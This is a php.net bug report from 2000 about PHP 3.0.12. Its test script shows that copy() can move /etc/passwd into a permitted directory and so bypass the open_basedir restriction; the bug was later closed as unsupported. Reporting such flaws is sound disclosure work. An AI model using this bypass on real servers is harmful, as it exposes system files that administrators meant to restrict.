php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #3454 Allows access to any directory on server
Submitted: 2000-02-11 07:38 UTC Modified: 2005-03-31 16:13 UTC
From: norikd at usa dot net Assigned:
Status: Wont fix Package: Other
PHP Version: 3.0.12 OS: RedHat 5.1
Private report: No CVE-ID: None
 [2000-02-11 07:38 UTC] norikd at usa dot net
php3.ini as follows

safe_mode=1
safe_mode_exec_string=/www/sites/mysite/cgi-bin
doc_root=/www/sites/mysite
open_basedir=/www/sites/mysite
extension=pgsql.so  

test.php3
<?php

copy("/etc/passwd","passwd");  /* this works */
$fd=fopen("passwd","r");           /* so does this */
fclose($fd);                             /* and this */

$fd=fopen("/etc/passwd","r");  /* this does is not successful */
fclose($fd);                           /* as it should not be */

?>    

So the system will allow me to copy the passwd file to a local allowd directory and then open it which bypasses the fact that I have restricted the system with open_basedir directive.

thanks

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2005-03-31 16:13 UTC] php-bugs at lists dot php dot net
We are sorry, but we do not support PHP 3 related problems anymore.
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Sat Dec 21 13:01:31 2024 UTC